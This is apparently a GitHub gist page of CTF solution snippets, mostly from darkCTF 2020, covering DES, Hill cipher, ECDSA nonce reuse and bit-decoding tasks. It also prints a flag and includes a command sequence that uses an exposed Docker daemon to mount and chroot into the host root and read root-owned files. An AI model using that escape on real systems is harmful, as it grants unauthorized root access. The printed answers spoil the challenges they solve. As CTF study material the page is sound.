Skip to content

Instantly share code, notes, and snippets.

View RDxR10's full-sized avatar
🎯
Focusing

RDxR10

🎯
Focusing
View GitHub Profile
netstat -tlp
curl localhost:2375/version //unencrypted connections on port 2375
export DOCKER_HOST="tcp://localhost:2375"
docker images //images available on local machine
docker run -it -v /:/host/ ubuntu:18.04 bash //starting an ubuntu container
cd /host/ //directory change to /host/
ls -l
chroot ./ bash
find / -name flag 2>/dev/null //Finding the flag location
cat /root/flag //To get the flag content
@RDxR10
RDxR10 / esb.txt
Created October 2, 2020 06:13
Solution to Cryptography/Ee See Bee - DarkCTF 2020
openssl enc -des-ecb -d -in enc.enc -out c.txt -K 84e39aa4994baf51
openssl enc -des-ecb -d -in c.txt -out cdec.txt -K 84e39aa4994baf51
@RDxR10
RDxR10 / cdec.txt
Created October 2, 2020 06:19
Part of the solution for Crypto/Ee See Bee - darkCTF 2020
Trotz der Kritik wurde DES im November 1976 als Bundesnorm genehmigt und am 15. Januar 1977 als FIPS PUB 46 veröffentlicht, das zur Verwendung für alle nicht klassifizierten Daten zugelassen ist.
Es wurde später 1983, 1988 (überarbeitet als FIPS-46-1), 1993 (FIPS-46-2) und erneut 1999 (FIPS-46-3) als Standard bestätigt, wobei letzteres "Triple DES" vorschrieb ( siehe unten).
Am 26. Mai 2002 wurde DES nach einem öffentlichen Wettbewerb endgültig durch den Advanced Encryption Standard (AES) abgelöst.
Am 19. Mai 2005 wurde FIPS 46-3 offiziell zurückgezogen, aber NIST hat Triple DES bis zum Jahr 2030 für vertrauliche Regierungsinformationen genehmigt.
Hier ist deine Flagge darkCTF{pr377y_0utd473d_3ncryp710n_574nd4rd}
@RDxR10
RDxR10 / etc.py
Created October 2, 2020 07:01
Solution For Crypto/Embrace The Climb from darkCTF 2020
# -*- coding: utf-8 -*-
"""
@author: RDxR10
The cipher used here was the "Hill Cipher". A 3x3 matrix has been utilised.
"""
import numpy as np
from egcd import egcd
encrypted_message = "lkeitrx66dcw{3zy1}tvzlrb4ilp9}1m0ifqjvuu3 1m0h9b5dc ucu3eicw{n}nauu3 95o00jd 0q55x66nwm"
@RDxR10
RDxR10 / dw.py
Last active October 26, 2020 22:36
Solution to Crypto/Duplicacy Within from darkCTF 2020
"""
input1:
30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad102202f88bf73d0f94a1e917d1a6e65ba15a9dbf52d0999c91f2c2c6bb710e018f7e001
input2:
30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad102203602aff824a32c19825425704546145d5fbc282ee912089923e824f46867647b01
Here we notice that the "r" values are equal which means that deriving the private key would be easy
which is:
@RDxR10
RDxR10 / desc-abb.txt
Created October 2, 2020 08:48
Description of Challenge - Amidst Bits and Bases from darkCTF 2020
that's a lot of 0's and 1's.
Holy Moly!
200 x 200 = 40,000
40,000 values to be exact.
Good luck decoding that!
Wait, I don't think decoding is the right word...
Well... Anyways... Good Luck!
hehehe...
@RDxR10
RDxR10 / abb.py
Created October 2, 2020 09:11
Solution to Misc/Amidst Bits and Bases from darkCTF 2020
from PIL import Image
with open("../crazy.txt", "r") as f:
dat = f.read()
lines = ''.join(dat.split("\n")[8:])
pixels = []
for i in lines:
if i == '1':
@RDxR10
RDxR10 / abb_q.py
Created October 2, 2020 11:30
Solution to Misc/Amidst Bits and Bases from darkCTF 2020
decoded_list=[]
for (i,j) in zip(bases,states):
#print(i,j)
if i=='Z':
if j=='|0>':
decoded_list.append('0')
if j=='|1>':
decoded_list.append('1')
if i=='X':
if j=='|+>':